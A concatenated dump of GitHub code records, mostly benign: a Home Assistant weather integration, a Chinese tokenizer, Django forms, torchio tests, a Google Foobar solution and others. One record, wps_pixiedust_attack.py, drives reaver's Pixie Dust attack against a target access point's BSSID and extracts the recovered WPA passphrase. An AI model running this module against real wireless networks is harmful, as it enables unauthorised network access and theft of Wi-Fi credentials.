1:\n if odd:\n return []\n else:\n odd = True\n self.ret = []\n self.helper(dic, [], l)\n res = []\n for r in self.ret: res.append(\"\".join(r))\n return res","repo_name":"JerryHu1994/LeetCode-Practice","sub_path":"Solutions/267-Palindrome-Permutation-II/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3475663872","text":"\"\"\"KNMI Diagnostics Support.\"\"\"\n# diagnostics.py\n\nimport asyncio\n\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import CONF_API_KEY, CONF_LATITUDE, CONF_LONGITUDE\nfrom homeassistant.core import HomeAssistant\n\nfrom . import DOMAIN, KnmiDataUpdateCoordinator\n\nTO_REDACT = {CONF_API_KEY, CONF_LATITUDE, CONF_LONGITUDE}\n\n\nclass KnmiDiagnostics:\n def __init__(self, hass: HomeAssistant) -> None:\n \"\"\"Initialize KNMI Diagnostics support.\"\"\"\n self.hass = hass\n self.coordinator_cache = self.hass.data[DOMAIN]\n\n async def get_config_entry_diagnostics(\n self, config_entry: ConfigEntry\n ) -> dict:\n \"\"\"Return diagnostics for a config entry.\n\n Args:\n config_entry (ConfigEntry): The config entry to get diagnostics for.\n\n Returns:\n dict: A dictionary containing the diagnostics information.\n \"\"\"\n self._validate_config_entry(config_entry)\n coordinator = self._get_coordinator(config_entry)\n data = await self._get_coordinator_data(coordinator)\n\n redacted_config_entry = {\n k: v for k, v in config_entry.as_dict().items() if k not in TO_REDACT\n }\n\n return {\n \"config_entry\": redacted_config_entry,\n \"data\": data,\n }\n\n def _validate_config_entry(self, config_entry: ConfigEntry) -> None:\n \"\"\"Validate if the input is a valid ConfigEntry instance.\n\n Args:\n config_entry (ConfigEntry): The config entry to validate.\n\n Raises:\n TypeError: If config_entry is not a ConfigEntry instance.\n \"\"\"\n if not isinstance(config_entry, ConfigEntry):\n raise TypeError(\"config_entry should be a ConfigEntry instance\")\n\n def _get_coordinator(self, config_entry: ConfigEntry) -> KnmiDataUpdateCoordinator:\n \"\"\"Retrieve the coordinator for the given config entry.\n\n Args:\n config_entry (ConfigEntry): The config entry to get the coordinator for.\n\n Returns:\n KnmiDataUpdateCoordinator: The coordinator associated with the config entry.\n \"\"\"\n return self.coordinator_cache.get(config_entry.entry_id)\n\n async def _get_coordinator_data(\n self, coordinator: KnmiDataUpdateCoordinator\n ) -> dict:\n \"\"\"Retrieve data from the coordinator, or return an empty dictionary if it's None.\n\n Args:\n coordinator (KnmiDataUpdateCoordinator): The coordinator to get data from.\n\n Returns:\n dict: The data from the coordinator or an empty dictionary if None.\n \"\"\"\n return coordinator.data or {}\n\n async def refresh_data(self, config_entry: ConfigEntry) -> None:\n \"\"\"Refresh KNMI data for a specific config entry.\n\n Args:\n config_entry (ConfigEntry): The config entry to refresh data for.\n \"\"\"\n coordinator = self._get_coordinator(config_entry)\n if coordinator:\n await coordinator.async_request_refresh()\n\n async def refresh_all_data(self) -> None:\n \"\"\"Refresh KNMI data for all config entries.\"\"\"\n await asyncio.gather(\n *[self.refresh_data(config_entry) for config_entry in self.hass.config_entries.async_entries(DOMAIN)]\n )\n\n async def async_on_remove(self) -> None:\n \"\"\"Remove config entries when the integration is uninstalled.\"\"\"\n async for config_entry in self.hass.config_entries.async_entries(DOMAIN):\n await self.hass.config_entries.async_remove(config_entry.entry_id)","repo_name":"HiDiHo01/ha-knmi","sub_path":"custom_components/knmi/diagnostics.py","file_name":"diagnostics.py","file_ext":"py","file_size_in_byte":3550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"19359113276","text":"#!/usr/bin/python3\n#-*- coding: utf-8 -*-\n\n\nimport os\nimport re\nimport copy\nimport jieba\nimport codecs\nimport jieba.analyse\nimport jieba.posseg as pseg\nfrom gensim import corpora\nfrom gensim import models\nfrom utils.global_names import GlobalNames, get_file_path \n\n\ndef _load_words(file_name):\n file_path = get_file_path(file_name)\n with codecs.open(file_path, \"r\", \"utf-8\") as rfd:\n words_set = set(rfd.read().splitlines())\n return words_set\n\n\nclass NlpUtil(object):\n\n punctuations_set = _load_words(GlobalNames.PUNCTUATIONS_FILE)\n stopwords_set = _load_words(GlobalNames.STOPWORDS_FILE)\n user_define_words = _load_words(GlobalNames.USER_DEFINE_WORDS)\n remove_words_set = _load_words(GlobalNames.REMOVE_WORDS_FILE)\n \n # Init jieba\n jieba.initialize()\n for w in user_define_words:\n jieba.add_word(w, freq=1000000)\n\n corpus_dict = None\n tfidf_model = None\n\n url_pattern = re.compile(r\"(https|http)://.+?html\")\n digit_pattern = re.compile(r\"\\d+\")\n bracket_pattern = re.compile(r\"\\[.+?\\]\")\n\n not_place_set = set([\"京东\", \"上门\", \"东西\", \"拜拜\", \"满意度\",\n \"新旧\", \"入口\", \"莫大\", \"蓝牙\", \"英伦\", \"顺顺利利\",\n \"哥哥\", \"立马\", \"海鲜\", \"回邮\", \"太多\", \"长北\", \"南那\",\n \"白跑\", \"天黑\", \"天阿\", \"美华\", \"华联\", \"日及\", \"山山\",\n \"京福顺\", \"卡拿\", \"太卡\", \"太大\", \"千古\", \"英哥\", \"两棵树\",\n \"太累\", \"包邮\", \"加半\", \"中华人名共和国\", \"六便士\", \"串联\",\n \"非顺丰\", \"中考\", \"北冰洋\", \"下嫩\", \"安安\", \"太鲜\", \"上拉\",\n \"入店\", \"上下水\", \"图京\", \"之城\", \"中断\", \"中武\", \"伦理\", \n \"中道\", \"之康\", \"多维度\", \"黑边\", \"中爱\", \"之泰\", \"锦园店\", \n \"三国\", \"阿门\", \"肯本\", \"刚京麦\", \"大黑\", \"朝霞\", \"关门大吉\", \n \"哥别\", \"沧桑\", \"下山\", \"日京京\", \"沙沙\", \"牙牙\", \"顿顿\", \"山高\",\n \"钱和京\", \"非买\", \"上旧\", \"四科\", \"西东\", \"上岗\", \"大山\", \n \"福尔马林\", \"滑黑\", \"上东\", \"中上\", \"内马尔\", \"中同\", \"中达\",\n \"下欧\", \"四门\", \"深春\", \"正东\", \"江南春\", \"入维\", \"大班\", \n \"中联\", \"猫沙\", \"长卡\", \"几环\", \"尾塞\", \"小桥流水\", \"澳邮\", \n \"上中\", \"英雄\", \"镇镇\", \"如东\", \"上口\", \"加邮\", \"八国\", \n \"福利\", \"台基\", \"那本\", \"中邮\", \"六本\", \"维沙\", \"中黑\", \n \"上美\", \"加花\", \"天哇\", \"远超过\", \"大拿\", \"贵干\", \"苏中\",\n \"三本\", \"酒塞\", \"七本\", \"美院\", \"中通\", \"美人壶加\", \"中充\",\n \"下国\", \"京伦\", \"九联\", \"上马\", \"美化\", \"江湖\", \"黑店\", \n \"几米远\", \"午安\", \"七哥\", \"角美\", \"日春\", \"几比\", \"确保安全\",\n \"壶水\", \"荷塘月色\", \"云集\", \"拉边\", \"欧克\", \"中右\", \"加的京\", \n \"上路\", \"烟嘴\", \"临证指南\", \"串口卡\", \"新建\", \"安利\", \"山泉水\",\n \"苏泊尔\", \"墨黑\", \"胶盆\", \"长达\", \"商城\"])\n\n\n @classmethod\n def place_recognize(cls, text):\n places = [w for w, flag in pseg.cut(text) if \"ns\" in flag \n and len(w) >= 2 \n and w not in cls.not_place_set \n and \"哈\" not in w\n and \"之\" not in w \n and \"本\" not in w\n and \"中\" not in w\n and \"嫩\" not in w\n and \"大\" not in w\n and \"鲜\" not in w\n and \"国\" not in w\n and \"上\" not in w\n and \"确\" not in w\n and \"牙\" not in w\n and \"壶\" not in w\n and \"阿\" not in w\n and \"入\" not in w\n and \"哥\" not in w\n and \"颗\" not in w\n and \"的\" not in w\n and \"联\" not in w\n and \"哇\" not in w]\n\n return places\n\n\n @classmethod\n def tokenize(cls,\n text,\n filter_punctuations=False,\n filter_stopwords=False,\n filter_alpha=False,\n remove_words=False,\n normalize_url=False,\n recognize_place=False,\n minimum_tokens_num=1): \n '''Tokenize text'''\n try:\n places = cls.place_recognize(text)\n for w in places:\n text = text.replace(w, \"[地址x]\")\n text = cls.digit_pattern.sub(\"[数字x]\", text)\n if normalize_url:\n text = cls.url_pattern.sub(\"URL\", text)\n tokens = jieba.lcut(text)\n text = \" \".join(tokens)\n for s in cls.bracket_pattern.findall(text):\n text = text.replace(s, s.replace(\" \", \"\"))\n text = text.replace(u\"# E - s [数字x]\", u\"#E-s[数字x]\")\n text = text.replace(u\"# E - s DIGIT [数字x]\", u\"#E-s[数字x]\")\n text = text.replace(u\"< s >\", \"\")\n tokens = text.split()\n tokens_copy = copy.copy(tokens)\n\n # Filter words.\n if filter_punctuations:\n tokens = [w for w in tokens if w not in cls.punctuations_set]\n if filter_stopwords:\n tokens = [w for w in tokens if w not in cls.stopwords_set]\n if filter_alpha:\n tokens = [w for w in tokens if not w.encode(\"utf-8\").isalpha()\n or w in set([\"URL\"])]\n if remove_words:\n tokens = [w for w in tokens if w not in cls.remove_words_set]\n\n if len(tokens) < minimum_tokens_num:\n tokens = tokens_copy\n\n new_tokens = tokens[:1]\n t_len = len(tokens)\n for i in range(1, t_len):\n if tokens[i] != tokens[i - 1]:\n new_tokens.append(tokens[i])\n return new_tokens\n except Exception as e:\n print (\"text=%s, errmsg=%s\" % (text, e))\n return [text]\n\n\n @classmethod\n def get_tfidf(cls, words):\n if cls.tfidf_model is None:\n corpus_dict_path = get_file_path(GlobalNames.CORPUS_DICT_FILE)\n cls.corpus_dict = corpora.Dictionary.load(corpus_dict_path)\n corpus_tfidf_path = get_file_path(GlobalNames.CORPUS_TFIDF_FILE)\n cls.tfidf_model = models.tfidfmodel.TfidfModel.load(corpus_tfidf_path)\n bow = cls.corpus_dict.doc2bow(words)\n tfidf = cls.tfidf_model[bow]\n tfidf = [(cls.corpus_dict[x[0]], x[1]) for x in tfidf]\n tfidf.sort(key=lambda x: x[1], reverse=True)\n return tfidf\n \n\n @classmethod\n def get_keywords(cls, text, size=3, way=None):\n if way == None or way == \"tfidf\":\n tokens = cls.tokenize(text)\n tfidf = cls.get_tfidf(tokens)\n ret_tokens = [x[0] for x in tfidf[:size]]\n return ret_tokens\n elif way == \"textrank\":\n return jieba.analyse.textrank(text, topK=size)\n","repo_name":"Dikea/Dialog-System-with-Task-Retrieval-and-Seq2seq","sub_path":"utils/nlp_util.py","file_name":"nlp_util.py","file_ext":"py","file_size_in_byte":6886,"program_lang":"python","lang":"en","doc_type":"code","stars":409,"dataset":"github-code","pt":"44"} +{"seq_id":"36715041610","text":"__PRIORITY__ = 0\n\nimport os\nimport re\nimport pexpect\nimport subprocess\nimport src.settings as settings\n\nfrom poormanslogging import info, warn, error\nfrom src.attacks.base_attack import BaseAttack\nimport src.utils.report as report\n\nclass wps_pixiedust(BaseAttack):\n\tdef __init__(self, p):\n\t\tpass\n\n\tdef run(self):\n\t\tinfo(\"Running Pixie Dust attack...\")\n\t\treport.saveLog(\"Running Pixie Dust attack...\")\n\t\tcmd_reaver = pexpect.spawn(\n\t\t\t'reaver -i {0} -c {1} -b {2} -vv -K 1'.format(settings.INTERFACE_MON, settings.TARGET_CHANNEL, settings.TARGET_BSSID))\n\t\tcmd_reaver.logfile = open(settings.LOG_FILE, 'wb')\n\t\tcmd_reaver.expect(['WPA PSK:','WPS pin not found!', pexpect.TIMEOUT, pexpect.EOF], 30)\n\t\tcmd_reaver.close()\n\n\t\tparse_log_crack = open(settings.LOG_FILE, 'r')\n\t\tfor line in parse_log_crack:\n\t\t\tif 'WPA PSK:' in line:\n\t\t\t\tkey_reg = re.split(\"('.*?')|(\\\".*?\\\")\", line)\n\t\t\t\tkey_filter = key_reg[1].replace(\"'\",\"\")\n\t\t\t\tsettings.TARGET_KEY = key_filter\n\t\t\t\tbreak\n\t\tparse_log_crack.close()\n\t\tos.remove(settings.LOG_FILE)\n\t\tif settings.TARGET_KEY is None:\n\t\t\twarn(\"Pixie Dust attack failed!\")\n\t\t\treport.saveLog(\"Pixie Dust attack failed!\")\n\t\n\tdef setup(self):\n\t\tpass\n\n\tdef check(self):\n\t\tdeps = [\"reaver\",\"pixiewps\"]\n\t\tfor d in deps:\n\t\t\tif subprocess.call([\"which\", d],stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) != 0:\n\t\t\t\terror(\"Required binary for {bin} not found.\".format(bin=d))\n\t\t\t\treport.saveLog(\"Required binary for {bin} not found.\".format(bin=d))\n\t\t\t\treturn False\n\t\treturn True\n","repo_name":"larry852/ppdron","sub_path":"src/attacks/wps_pixiedust_attack.py","file_name":"wps_pixiedust_attack.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37670887378","text":"from django import forms\nfrom django.forms.models import inlineformset_factory\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Fieldset, Div, Row, Column, Hidden, ButtonHolder, Submit\n\nfrom forms.custom_layout_object import Formset\nfrom forms.fields import ModelChoiceFieldWithCreate\nfrom forms.models.expense_desc import ExpenseDesc, ExpenseDescLine\n\n\nclass ExpenseDescLineForm(forms.ModelForm):\n class Meta:\n model = ExpenseDescLine\n exclude = ()\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_show_labels = False\n for _, field in self.fields.items():\n if field.widget.input_type == 'select':\n field.widget.attrs.update({'class': 'select_class'})\n else:\n field.widget.attrs['class'] = 'form-control'\n\n\nExpenseDescFormSet = inlineformset_factory(\n ExpenseDesc, ExpenseDescLine, form=ExpenseDescLineForm,\n fields=['gross_internal_income', 'official_expense',\n 'financial_support_expense', 'future_expense', 'capital_expenditure', 'expense_desc'],\n extra=1,\n can_delete=True\n)\n\n\nclass ExpenseDescForm(forms.ModelForm):\n\n class Meta:\n model = ExpenseDesc\n fields = '__all__'\n exclude = ('create_user', )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'form_to_submit'\n self.helper.form_tag = True\n self.helper.layout = Layout(\n Hidden('next_state', 'next'),\n Row(\n css_class='form-row'\n ),\n Div(\n Fieldset('',\n Formset('lines')\n ),\n\n )\n )\n","repo_name":"Rabin5/formcollection","sub_path":"forms/forms/expense_desc.py","file_name":"expense_desc.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73246285892","text":"'''\n@author: Dascalu Cosmin-Andrei\n'''\n\nfrom erori.exceptii import ValidError , RepoError\nfrom utils.dictionare import character_to_decimal\n\nclass Validator(object):\n \n def __init__(self):\n '''\n Functie de tip constructor care construieste un obiect de tip Validator\n Input: - \n Output: -\n '''\n pass \n\n def valideaza_operatie(self, numarA, numarB, operatie):\n '''\n Functie care valideaza operatiile ce pot fi efectuate intre cele 2 numere\n Input: numarA, numarB - entitati de tip Numar\n operatie - un caracter \n Output: - \n Raises: Exception\n if operations is '/' and the second number is 0 -> \"Divide by 0!\\n\"\n if operation is '-' and the second number is bigger than the first number -> \"Scadere negativa!\\n\"\n '''\n erori = ''\n if operatie == '/': \n if numarB.get_valoare() == '0': \n erori += \"Divide by 0!\\n\"\n elif operatie == '-': \n if len(numarA.get_valoare()) < len(numarB.get_valoare()):\n erori += \"Scadere negativa!\\n\"\n elif len(numarA.get_valoare()) == len(numarB.get_valoare()):\n # Verific daca de la stanga la dreapta numarulA are o cifra mai mica decat numarulB.\n scadereNegativa = False \n index = 0 \n while index < len(numarA.get_valoare()) and scadereNegativa == False: \n if numarA.get_valoare()[index] < numarB.get_valoare()[index]: \n scadereNegativa = True \n index = index + 1 \n if scadereNegativa == True: \n erori += \"Scadere negativa!\\n\"\n if len(erori) > 0: # Exista erori \n raise RepoError(erori)\n\n def valideaza_operatie_input(self, operatie):\n '''\n Functie care valideaza operatia aritmetica de baza\n Input: operatie - un string \n Output: - \n Raises: Exception \n daca operatia este diferita de '+-*/' -> \"Operatie aritmetica nevalida!\\n\"\n '''\n if len(operatie) != 1 or operatie not in '+-*/': \n raise ValidError(\"Operatie aritmetica nevalida!\\n\")\n\n def valideaza_baza(self, baza):\n '''\n Functie care valideaza baza de numeratie a unui numar\n Input: baza - un numar intreg \n Output: - \n Raises: Exception\n daca baza nu apartine multimii {2,3, 4, ..., 10, 16} -> \"Baza de numeratie nevalida!\\n\"\n '''\n if baza not in ['2', '3', '4', '5', '6', '7', '8', '9', '10', '16']:\n raise ValidError(\"Baza de numeratie nevalida!\")\n\n def valideaza_numar(self, valoare_numar, baza):\n '''\n Functie care valideaza daca un numar are toate cifrele intr-o baza de numeratie\n Input: valoare_numar - un string\n baza - un string, pentru care valoarea sa apartine {2, 3, ..., 10, 16}\n Output: - \n Raises: Exception\n daca numarul contine o cifra care nu este in baza transmisa ca parametru -> \"Numar nevalid!\"\n '''\n # Verificam daca toate cifrele sunt cel putin in bazele admise (2, 3, ..., 10, 16)\n for digit in valoare_numar:\n if digit not in character_to_decimal:\n raise ValidError(\"Numar nevalid!\")\n # Verificam toate toate cifrele sunt mai mici decat baza data\n for digit in valoare_numar: \n digit_integer = character_to_decimal[digit]\n baza_integer = int(baza)\n if digit_integer >= baza_integer: \n raise ValidError(\"Numar nevalid!\")\n","repo_name":"DascaluCosmin/BaseConverter","sub_path":"Conversii/ConversionOperations/valid/validatoare.py","file_name":"validatoare.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22729470858","text":"import tempfile\nfrom pathlib import Path\n\nimport numpy as np\nimport pytest\nimport SimpleITK as sitk\nimport torch\nfrom torchio.data import io\nfrom torchio.data import ScalarImage\n\nfrom ..utils import TorchioTestCase\n\n\nclass TestIO(TorchioTestCase):\n \"\"\"Tests for `io` module.\"\"\"\n\n def setUp(self):\n super().setUp()\n self.nii_path = self.get_image_path('read_image')\n self.dicom_dir = self.get_tests_data_dir() / 'dicom'\n self.dicom_path = self.dicom_dir / 'IMG0001.dcm'\n string = (\n '1.5 0.18088 -0.124887 0.65072 '\n '-0.20025 0.965639 -0.165653 -11.6452 '\n '0.0906326 0.18661 0.978245 11.4002 '\n '0 0 0 1 '\n )\n tensor = torch.as_tensor(np.fromstring(string, sep=' ').reshape(4, 4))\n self.matrix = tensor\n\n def test_read_image(self):\n # I need to find something readable by nib but not sitk\n io.read_image(self.nii_path)\n\n def test_save_rgb(self):\n im = ScalarImage(tensor=torch.rand(1, 4, 5, 1))\n with pytest.warns(RuntimeWarning):\n im.save(self.dir / 'test.jpg')\n\n def test_read_dicom_file(self):\n tensor, _ = io.read_image(self.dicom_path)\n assert tuple(tensor.shape) == (1, 88, 128, 1)\n\n def test_read_dicom_dir(self):\n tensor, _ = io.read_image(self.dicom_dir)\n assert tuple(tensor.shape) == (1, 88, 128, 17)\n\n def test_dicom_dir_missing(self):\n with pytest.raises(FileNotFoundError):\n io._read_dicom('missing')\n\n def test_dicom_dir_no_files(self):\n empty = self.dir / 'empty'\n empty.mkdir()\n with pytest.raises(FileNotFoundError):\n io._read_dicom(empty)\n\n def write_read_matrix(self, suffix):\n out_path = self.dir / f'matrix{suffix}'\n io.write_matrix(self.matrix, out_path)\n matrix = io.read_matrix(out_path)\n assert torch.allclose(matrix, self.matrix)\n\n def test_matrix_itk(self):\n self.write_read_matrix('.tfm')\n self.write_read_matrix('.h5')\n\n def test_matrix_txt(self):\n self.write_read_matrix('.txt')\n\n def test_ensure_4d_5d(self):\n tensor = torch.rand(3, 4, 5, 1, 2)\n assert io.ensure_4d(tensor).shape == (2, 3, 4, 5)\n\n def test_ensure_4d_5d_t_gt_1(self):\n tensor = torch.rand(3, 4, 5, 2, 2)\n with pytest.raises(ValueError):\n io.ensure_4d(tensor)\n\n def test_ensure_4d_2d(self):\n tensor = torch.rand(4, 5)\n assert io.ensure_4d(tensor).shape == (1, 4, 5, 1)\n\n def test_ensure_4d_2d_3dims_rgb_first(self):\n tensor = torch.rand(3, 4, 5)\n assert io.ensure_4d(tensor).shape == (3, 4, 5, 1)\n\n def test_ensure_4d_2d_3dims_rgb_last(self):\n tensor = torch.rand(4, 5, 3)\n assert io.ensure_4d(tensor).shape == (3, 4, 5, 1)\n\n def test_ensure_4d_3d(self):\n tensor = torch.rand(4, 5, 6)\n assert io.ensure_4d(tensor).shape == (1, 4, 5, 6)\n\n def test_ensure_4d_2_spatial_dims(self):\n tensor = torch.rand(4, 5, 6)\n assert io.ensure_4d(tensor, num_spatial_dims=2).shape == (4, 5, 6, 1)\n\n def test_ensure_4d_3_spatial_dims(self):\n tensor = torch.rand(4, 5, 6)\n assert io.ensure_4d(tensor, num_spatial_dims=3).shape == (1, 4, 5, 6)\n\n def test_ensure_4d_nd_not_supported(self):\n tensor = torch.rand(1, 2, 3, 4, 5)\n with pytest.raises(ValueError):\n io.ensure_4d(tensor)\n\n def test_sitk_to_nib(self):\n data = np.random.rand(10, 12)\n image = sitk.GetImageFromArray(data)\n tensor, _ = io.sitk_to_nib(image)\n assert data.sum() == pytest.approx(tensor.sum())\n\n def test_sitk_to_affine(self):\n spacing = 1, 2, 3\n direction_lps = -1, 0, 0, 0, -1, 0, 0, 0, 1\n origin_lps = l, p, s = -10, -20, 30\n image = sitk.GetImageFromArray(np.random.rand(10, 20, 30))\n image.SetDirection(direction_lps)\n image.SetSpacing(spacing)\n image.SetOrigin(origin_lps)\n origin_ras = -l, -p, s\n fixture = np.diag((*spacing, 1))\n fixture[:3, 3] = origin_ras\n affine = io.get_ras_affine_from_sitk(image)\n self.assert_tensor_almost_equal(fixture, affine)\n\n\n# This doesn't work as a method of the class\nlibs = 'sitk', 'nibabel'\nparameters = []\nfor save_lib in libs:\n for load_lib in libs:\n for dims in 2, 3, 4:\n parameters.append((save_lib, load_lib, dims))\n\n\n@pytest.mark.parametrize(('save_lib', 'load_lib', 'dims'), parameters)\ndef test_write_nd_with_a_read_it_with_b(save_lib, load_lib, dims):\n shape = [1, 4, 5, 6]\n if dims == 2:\n shape[-1] = 1\n elif dims == 4:\n shape[0] = 2\n tensor = torch.randn(*shape)\n affine = np.eye(4)\n tempdir = Path(tempfile.gettempdir()) / '.torchio_tests'\n tempdir.mkdir(exist_ok=True)\n path = tempdir / 'test_io.nii'\n save_function = getattr(io, f'_write_{save_lib}')\n load_function = getattr(io, f'_read_{save_lib}')\n save_function(tensor, affine, path)\n loaded_tensor, loaded_affine = load_function(path)\n TorchioTestCase.assert_tensor_equal(\n tensor.squeeze(),\n loaded_tensor.squeeze(),\n msg=f'Save lib: {save_lib}; load lib: {load_lib}; dims: {dims}',\n )\n TorchioTestCase.assert_tensor_equal(affine, loaded_affine)\n\n\nclass TestNibabelToSimpleITK(TorchioTestCase):\n def setUp(self):\n super().setUp()\n self.affine = np.eye(4)\n\n def test_wrong_num_dims(self):\n with pytest.raises(ValueError):\n io.nib_to_sitk(np.random.rand(10, 10), self.affine)\n\n def test_2d_single(self):\n data = np.random.rand(1, 10, 12, 1)\n image = io.nib_to_sitk(data, self.affine)\n assert image.GetDimension() == 2\n assert image.GetSize() == (10, 12)\n assert image.GetNumberOfComponentsPerPixel() == 1\n\n def test_2d_multi(self):\n data = np.random.rand(5, 10, 12, 1)\n image = io.nib_to_sitk(data, self.affine)\n assert image.GetDimension() == 2\n assert image.GetSize() == (10, 12)\n assert image.GetNumberOfComponentsPerPixel() == 5\n\n def test_2d_3d_single(self):\n data = np.random.rand(1, 10, 12, 1)\n image = io.nib_to_sitk(data, self.affine, force_3d=True)\n assert image.GetDimension() == 3\n assert image.GetSize() == (10, 12, 1)\n assert image.GetNumberOfComponentsPerPixel() == 1\n\n def test_2d_3d_multi(self):\n data = np.random.rand(5, 10, 12, 1)\n image = io.nib_to_sitk(data, self.affine, force_3d=True)\n assert image.GetDimension() == 3\n assert image.GetSize() == (10, 12, 1)\n assert image.GetNumberOfComponentsPerPixel() == 5\n\n def test_3d_single(self):\n data = np.random.rand(1, 8, 10, 12)\n image = io.nib_to_sitk(data, self.affine)\n assert image.GetDimension() == 3\n assert image.GetSize() == (8, 10, 12)\n assert image.GetNumberOfComponentsPerPixel() == 1\n\n def test_3d_multi(self):\n data = np.random.rand(5, 8, 10, 12)\n image = io.nib_to_sitk(data, self.affine)\n assert image.GetDimension() == 3\n assert image.GetSize() == (8, 10, 12)\n assert image.GetNumberOfComponentsPerPixel() == 5\n","repo_name":"fepegar/torchio","sub_path":"tests/data/test_io.py","file_name":"test_io.py","file_ext":"py","file_size_in_byte":7212,"program_lang":"python","lang":"en","doc_type":"code","stars":1864,"dataset":"github-code","pt":"44"} +{"seq_id":"33978031254","text":"# lets define a class bike\nclass Bike:\n def __init__ (self, colour, frame_material):\n self.colour = colour\n self.frame_material = frame_material\n\n def brake(self):\n print(\"Breaking\")\n\n\n# lets create a couple of instances\nred_bike = Bike('Red','carbon fiber')\nblue_bike = Bike('Blue','steel')\n\n# lets inspect the object\nprint(red_bike.colour)\nprint(red_bike.frame_material)\nprint(blue_bike.colour)\nprint(blue_bike.frame_material)\n\n# lets brake\nred_bike.brake()\n\n","repo_name":"vlvanchin/learn","sub_path":"learn_python/bin/bike.py","file_name":"bike.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37041863159","text":"from codebase_craft.dynamic_codebase_templating import template_manager\r\nfrom codebase_craft.codebase_setup.directory_setup import (\r\n create_directory,\r\n setup_directory,\r\n)\r\n\r\nfrom codebase_craft.utils.handlers import (\r\n log_info,\r\n print_success,\r\n start_progress_task,\r\n update_progress,\r\n)\r\n\r\n\r\ndef setup_command(logger, console, project_name, template):\r\n log_info(f\"Loading template: {template}\")\r\n template = template_manager.load_template(logger, template)\r\n\r\n task_id = start_progress_task(100, f\"Setting up the {project_name} directory\")\r\n log_info(f\"Creating the project codebase directory for {project_name}\")\r\n create_directory(project_name, logger)\r\n update_progress(task_id, 50)\r\n\r\n log_info(f\"Setting up the {project_name}/ directory\")\r\n setup_directory(template, project_name, logger)\r\n update_progress(task_id, 50)\r\n\r\n print_success(\"Setup complete.\")\r\n","repo_name":"cybrvybe/codebase-craft","sub_path":"x1dra.ai/cli/commands/setup_commands.py","file_name":"setup_commands.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22050891286","text":"source_url = \"https://blog.ishandeveloper.com/foobar-2020\"\n\n\n# Mod:\n# - cast output from pow() to int\n\ndef dTob(d, b):\n digits = []\n while d > 0:\n digits.insert(0, str(d % b))\n d = d / b\n return ''.join(digits)\n\ndef bTod(b, c):\n n = 0\n for d in str(b):\n n = c * n + int(d)\n return n\n\ndef negative(x, y, b):\n if b==10:\n return int(x) - int(y)\n\n dx=bTod(x,b)\n dy=bTod(y,b)\n dz=dx-dy\n return dTob(dz, b)\n\ndef solution(n, b):\n arr=[]\n while True:\n i = \"\".join(sorted(str(n), reverse=True))\n j = \"\".join(sorted(str(n)))\n k = negative(i,j,b)\n\n k2 = len(str(k))\n i2 = len(str(i))\n\n if (k2) != i2:\n k = k * int(pow(10 ,(i2-k2)))\n\n for index, item in enumerate(arr):\n if item == k:\n return index + 1\n arr = [k] + arr\n n = k\n","repo_name":"1969-07-20/GoogleFoobarChallenge","sub_path":"OfflineTester/Level2_HeyIAlreadyDidThat/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"27530491311","text":"import abc\nimport torch\n\nfrom core.models.model_utils import couple, decouple, get_colourisation_mask\n\n\nclass Corrector(abc.ABC):\n def __init__(self, sde, snr, n_steps):\n super().__init__()\n self.sde = sde\n self.snr = snr\n self.n_steps = n_steps\n\n @abc.abstractmethod\n def update_fn(self, network, x, t):\n pass\n\n def inpainting_update_fn(self, network, data, mask, x, t):\n with torch.no_grad():\n vec_t = torch.ones(data.shape[0], device=data.device) * t\n x, x_mean = self.update_fn(network, x, vec_t)\n masked_data_mean, std = self.sde.marginal_prob(data, vec_t)\n masked_data = (\n masked_data_mean + torch.randn_like(x) * std[:, None, None, None]\n )\n x = x * (mask) + masked_data * (1.0 - mask)\n x_mean = x * (mask) + masked_data_mean * (1.0 - mask)\n return x, x_mean\n\n def colorization_update_fn(self, network, gray_scale_img, x, t):\n with torch.no_grad():\n mask = get_colourisation_mask(x)\n vec_t = torch.ones(x.shape[0], device=x.device) * t\n x, x_mean = self.update_fn(network, x, vec_t)\n masked_data_mean, std = self.sde.marginal_prob(\n decouple(gray_scale_img), vec_t\n )\n masked_data = (\n masked_data_mean + torch.randn_like(x) * std[:, None, None, None]\n )\n x = couple(decouple(x) * (1.0 - mask) + masked_data * mask)\n x_mean = couple(decouple(x) * (1.0 - mask) + masked_data_mean * mask)\n return x, x_mean\n\n\nclass NoneCorrector(Corrector):\n def __init__(self, sde, snr, n_steps):\n super().__init__(sde, snr, n_steps)\n\n def update_fn(self, network, x, t):\n return x, x\n","repo_name":"satnavpt/DDPMs-Inpainting","sub_path":"diffusion/core/models/sdes/correctors/corrector.py","file_name":"corrector.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"31442036535","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\nfrom __future__ import division\n\nimport math as maths\nimport os\n\nfrom pypyx.pypyx import colour, pic, pypyx_maths\n\np = pic (scale = 4.0)\n\no = (0, 0)\nd = maths.sqrt(3) / 2\n\n### o'clock positions\nd2 = (d, .5)\nd4 = (d, -.5)\nd6 = (0, 